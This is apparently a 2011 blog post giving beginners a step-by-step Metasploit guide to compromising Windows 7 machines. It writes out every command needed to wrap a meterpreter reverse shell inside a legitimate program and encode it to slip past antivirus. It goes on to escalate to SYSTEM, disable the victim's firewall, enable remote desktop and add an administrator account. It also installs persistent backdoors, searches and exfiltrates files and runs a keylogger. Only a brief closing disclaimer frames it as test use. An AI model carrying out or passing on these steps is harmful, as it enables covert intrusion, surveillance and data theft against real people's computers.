Pentest on BT4 R1
Text in {} = Titles
# In front of text = Info
Text in [] = Your Input
# Here are some examples on [] from the guide beneath:
# rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop -u "John"
# search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg
# So when you input anything where there is [], remember to remove the []
{Shell 1} (Creating Exploit)
# If you get encoder error find another EXE or try to encode it less timeCode:cd /pentest/exploits/framework3/ svn up # To update framework3 clear ./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many time it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
# Copy payload to target
{Shell 2} (Using Exploit)
----------Code:cd /pentest/exploits/framework3/ clear ./msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [IP ADRESS INT.] set LPORT [PORT] (if used in msfpayload in Shell 1) show options exploit
# Now we wait for connection, so start the payload on victim computer
# Now we are in the systemCode:use priv ps # Look for PID on explorer.exe migrate [PID on explorer] getsystem sysinfo # If "Arch = x64" = NO HASHDUMP it won't work
{Prepare for RDP}
{USER:} (Still in shell)Code:shell # Connect to CMD reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f # Allows incoming terminal service connections reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f # Disables blocking incoming Terminal service connections Netsh firewall set opmode enable # Enable Firewall on Victim Netsh firewall set opmode disable # Disable Firewall on Victim
# CTRL + Z then Y to exit shell without it freezing the systemCode:net user [USERNAME] [PASSWORD] # Change password for the user # Or create you own user net user [USERNAME] [PASSWORD] /add net localgroup [GROUP] [USERNAME] /add # In [GROUP] you could use "administrators" and [USERNAME] is the user you just created net accounts /maxpwage:[days] | unlimited # Examples: net accounts /maxpwage:6 # or: net accounts /maxpwage:unlimited
{Shell 3} (RDP to compromised system)
# No need for ":" and [PORT] if local
# Remember to be in "root@bt:~#"
-------------------------------------Code:rdesktop [IP]:[port] -u "[USERNAME]"
{Setting up backdoors for future use} (when in meterpreter console)
Code:run metsvc (set backdoor for next time you want in) (OR THIS) run persistence -r [YOUR IP ADRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300 # 300 tells it to send request for connection every 300 sec. "run persistence -h" for more info
VERY BAD: All 3 files is use gets flagged by Norton Internet Security 2011 as trojan, maybe other AV's will do this too!
BAD: If ip change you have to know the IP to connect back to Victim
GOOD: Easy to use
GOOD: It dosn't request YOUR IP and port!
BAD: It requests YOUR IP and port!
BAD: Can be more "difficult" to use
GOOD: Flexible
GOOD: Auto Connect
ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It's only when you run NPE (Norton Power Eraser) it is detected as bad, and will be removed. and that's a tool you must download!
{GET BACK INTO SYSTEM} (using metsvc in a new terminal)
------------------------------------Code:cd /pentest/exploits/framework3/ svn up clear ./msfconsole use exploit/multi/handler set PAYLOAD windows/metsvc_bind_tcp set LPORT 31337 (Must be this port of what i know) set RHOST [VICTIM IP ADRESS] show options (see if your setup is correct) exploit
{GET BACK INTO SYSTEM} (using persistence in a new terminal)
----------Code:cd /pentest/exploits/framework3/ svn up clear ./msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [IP ADRESS INT.] set LPORT [PORT] # The port set in persistence backdoor show options exploit
# Now we wait for connection, it will reconnect to your computer within 300 sec
# If = "NT AUTHORITY\SYSTEM" do this else go to "use priv":
# Find PID on explorer.exe
steal_token [NUMBER - PID on explorer]
# From what i know it grants you the same rights as the user running that process
use priv
get system
{Search} (in meterpreter console)
------------------------------------Code:search -f *.jpg # Finding all JPG files on the system search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg # Finding all JPG filen i a specific folder searct -f test.txt # Find a specific file on the whole system
{Uploading and Downloading} (How I use it)
# Use "ls", "pwd" and "cd" to navigate around - see below under commands
Create a txt file on yout BT4 desktop and write any thing in it, or nothing, and save it with the name "test.txt" then in terminal in meterpreter console (after your connected to victim), navigate to the desktop of the user currently logged in.
Use "pwd" without quotes, to check if the path is correct, if it is type the following:
# Or if your not in the path where you want to upload a file, and want it to be uploaded to another folderCode:upload /root/test.txt test.txt # and if you are uploading a file with space in it's name: upload "/root/test 2.txt" "test 2.txt"
upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
# Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"
Now we are going to download the file we just uploaded the "test.txt". Navigate to the folder if your not already in it, by using the "cd", "pwd" and "ls" commands.
Then type:
------------------------------------Code:download test.txt /root/test.txt # And if you are downloading a file with space in it's name download "test 2.txt" "/root/test 2.txt" # Or if your not in the path where you want to download a file from, but know the exact path and name by using search download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt" # Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"
{Commands} (meterpreter console)
# USE THIS!!! thats mostly how i got this knowledge and then googled the commands to get more info on them
# No need to say what it does - remember you must have used "use priv" in meterpreter first
# You get it - Change directory
# Show what directory your in
# List Current Directory
# See above
# See above
# See above and Meterpreter Search This can be used in diff. consoles!
# Key Sniffer - Start
# Key Sniffer - dump keys while running
# Key Sniffer - Stop
Few words from me:
First i will say, USE THIS AT YOUR OWN RISK! Do not blame me for anything. DO NOT misuse this information, only use this in a test setup!
And i will point out for other beginners, i started on using metasploit 2 days ago so do your self a favour and put some heart into it, do your legwork before asking, i just gave you a complete detailed guide from start to finish, on a silver platter.
As always, if you have any questions, google it first and then google it some more, and THEN ask for directions, not the solution!
Please give some feedback![]()
Monday, March 14, 2011
Metasploit attack on Win 7 x86/x64 - Detailed for beginners
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